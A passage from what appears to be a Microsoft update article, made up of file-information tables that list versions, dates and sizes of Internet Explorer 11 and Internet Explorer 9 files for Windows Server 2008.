12:03| 51,200 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 35,328 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 11,264 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 9,216 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 6,656 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 47,104 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 114,176 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 124,928 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 122,880 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 130,048 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 138,240 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 114,688 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 131,584 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 117,760 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 122,368 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 134,144 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 107,008 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 127,488 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 128,512 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 88,576 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 82,944 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 120,320 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 125,952 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 128,000 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 124,416 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 121,856 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 115,712 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 11:46| 341,896 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2018| 6:18| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 52,736 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 18:48| 11,776 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 18:46| 341,504 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 18:39| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:51| 290,304 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 64,000 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 1,075,200 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2018| 6:27| 8,798 \nticrf.rat| Not versioned| 23-Sep-2018| 6:27| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 11:46| 228,232 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:24| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,066,432 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:20| 475,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \n \n### **Windows Server 2008**\n\n### \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21532| 13-Feb-2021| 11:38| 1,141,248 \niexplore.exe| 9.0.8112.21532| 13-Feb-2021| 11:48| 751,544 \ninetcpl.cpl| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,427,968 \nwininet.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 1,132,032 \njsproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 75,776 \nWininetPlugin.dll| 1.0.0.1| 13-Feb-2021| 11:36| 66,048 \ntdc.ocx| 9.0.8112.21532| 13-Feb-2021| 11:35| 63,488 \niedvtool.dll| 9.0.8112.21532| 13-Feb-2021| 11:37| 678,912 \ndxtmsft.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 354,304 \ndxtrans.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 223,744 \nmsfeeds.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 607,744 \nmsfeeds.mof| Not versioned| 13-Feb-2021| 11:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Feb-2021| 11:11| 1,574 \nmsfeedsbs.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 41,472 \nmsfeedssync.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 10,752 \nmshta.exe| 9.0.8112.21532| 13-Feb-2021| 11:35| 11,776 \nhtml.iec| 2019.0.0.21527| 13-Feb-2021| 11:40| 367,616 \nmshtmled.dll| 9.0.8112.21532| 13-Feb-2021| 11:35| 72,704 \nmshtml.dll| 9.0.8112.21532| 13-Feb-2021| 11:45| 12,844,544 \nmshtml.tlb| 9.0.8112.21532| 13-Feb-2021| 11:35| 2,382,848 \nielowutil.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 223,232 \nieproxy.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 195,072 \nIEShims.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 194,560 \nExtExport.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 27-Apr-2018| 10:11| 85,548 \nWindows Information Bar.wav| Not versioned| 27-Apr-2018| 10:11| 23,308 \nWindows Feed Discovered.wav| Not versioned| 27-Apr-2018| 10:11| 19,884 \nWindows Navigation Start.wav| Not versioned| 27-Apr-2018| 10:11| 11,340 \nieUnatt.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 142,848 \njsdbgui.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 388,096 \niertutil.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 13-Feb-2021| 11:48| 142,776 \nVGX.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 769,024 \nurl.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 231,936 \nieframe.dll| 9.0.8112.21532| 13-Feb-2021| 11:39| 9,757,696 \nieui.dll| 9.0.8112.21532| 13-Feb-2021| 11:34| 176,640 \nieinstal.exe| 9.0.8112.21532| 13-Feb-2021| 11:36| 474,624 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:53| 393,813 \ninetres.admx| Not versioned| 27-Apr-2018| 10:14| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21532| 13-Feb-2021| 11:36| 104,448 \njscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 723,456 \njscript9.dll| 9.0.8112.21532| 13-Feb-2021| 11:43| 1,819,648 \nvbscript.dll| 5.8.7601.21527| 13-Feb-2021| 11:36| 434,176 \n \n### \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21532| 13-Feb-2021| 12:30| 1,390,592 \niexplore.exe| 9.0.8112.21532| 13-Feb-2021| 12:52| 757,688 \ninetcpl.cpl| 9.0.8112.21532| 13-Feb-2021| 12:28| 1,494,528 \nwininet.dll| 9.0.8112.21532| 13-Feb-2021| 12:30| 1,394,688 \njsproxy.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 97,280 \nWininetPlugin.dll| 1.0.0.1| 13-Feb-2021| 12:28| 86,528 \ntdc.ocx| 9.0.8112.21532| 13-Feb-2021| 12:27| 76,800 \niedvtool.dll| 9.0.8112.21532| 13-Feb-2021| 12:29| 887,808 \ndxtmsft.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 452,608 \ndxtrans.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 281,600 \nmsfeeds.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 729,088 \nmsfeeds.mof| Not versioned| 13-Feb-2021| 12:02| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Feb-2021| 12:02| 1,574 \nmsfeedsbs.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 55,296 \nmsfeedssync.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 11,264 \nmshta.exe| 9.0.8112.21532| 13-Feb-2021| 12:27| 12,800 \nhtml.iec| 2019.0.0.21527| 13-Feb-2021| 12:37| 448,512 \nmshtmled.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 96,256 \nmshtml.dll| 9.0.8112.21532| 13-Feb-2021| 12:47| 18,810,880 \nmshtml.tlb| 9.0.8112.21532| 13-Feb-2021| 12:27| 2,382,848 \nielowutil.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 223,744 \nieproxy.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 550,912 \nIEShims.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 27-Apr-2018| 10:11| 85,548 \nWindows Information Bar.wav| Not versioned| 27-Apr-2018| 10:11| 23,308 \nWindows Feed Discovered.wav| Not versioned| 27-Apr-2018| 10:11| 19,884 \nWindows Navigation Start.wav| Not versioned| 27-Apr-2018| 10:11| 11,340 \nieUnatt.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 173,568 \njsdbgui.dll| 9.0.8112.21532| 13-Feb-2021| 12:29| 499,712 \niertutil.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 13-Feb-2021| 12:52| 176,048 \nVGX.dll| 9.0.8112.21532| 13-Feb-2021| 12:29| 997,376 \nurl.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 237,056 \nieframe.dll| 9.0.8112.21532| 13-Feb-2021| 12:33| 10,944,000 \nieui.dll| 9.0.8112.21532| 13-Feb-2021| 12:25| 248,320 \nieinstal.exe| 9.0.8112.21532| 13-Feb-2021| 12:28| 490,496 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:56| 393,813 \ninetres.admx| Not versioned| 27-Apr-2018| 10:14| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21532| 13-Feb-2021| 12:28| 141,312 \njscript.dll| 5.8.7601.21527| 13-Feb-2021| 12:28| 818,176 \njscript9.dll| 9.0.8112.21532| 13-Feb-2021| 12:36| 2,358,784 \nvbscript.dll| 5.8.7601.21527| 13-Feb-2021| 12:28| 583,680 \niexplore.exe| 9.0.8112.21532| 13-Feb-2021| 11:48| 751,544 \nieUnatt.exe| 9.0.8112.21532| 13-Feb-2021| 